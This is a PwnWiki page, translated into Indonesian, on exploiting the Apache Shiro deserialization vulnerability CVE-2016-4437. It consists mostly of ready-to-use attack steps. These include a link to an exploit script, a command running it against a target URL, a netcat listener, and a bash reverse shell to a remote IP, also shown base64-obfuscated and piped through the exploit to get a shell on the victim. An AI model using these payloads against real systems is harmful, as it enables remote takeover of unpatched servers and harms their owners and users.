CVE-2016-4437 Kerentanan deserialisasi Shiro

This page is a translated version of the page CVE-2016-4437 Shiro反序列化漏洞 and the translation is 100% complete.

Other languages:

Bahasa Indonesia • ‎Chinese • ‎русский • ‎中文（简体）‎

POC

https://github.com/insightglacier/Shiro_exploit

Eksploitasi

python3 shiro_exploit.py -t 3 -u http://192.168.2.147:8080 -p "touch a.txt"

Perintah berhasil dijalankan.

Getshell

Mesin pemantau menjalankan perintah berikut:

nc -lvp 666

Mesin korban menjalankan perintah berikut:

bash -i >& /dev/tcp/192.168.2.130/6666 0>&1
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMTMwLzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}

python3 shiro_exploit.py -t 3 -u http://192.168.2.147:8080 -p "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMTMwLzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}"

Anonymous

Search

CVE-2016-4437 Kerentanan deserialisasi Shiro

Namespaces

More

Page actions

POC

Eksploitasi

Getshell

Navigation

Navigation

Community

PwnWiki.org

Wiki tools

Wiki tools

Anonymous

Search

CVE-2016-4437 Kerentanan deserialisasi Shiro

POC

Eksploitasi

Getshell

Navigation

Wiki tools

Page tools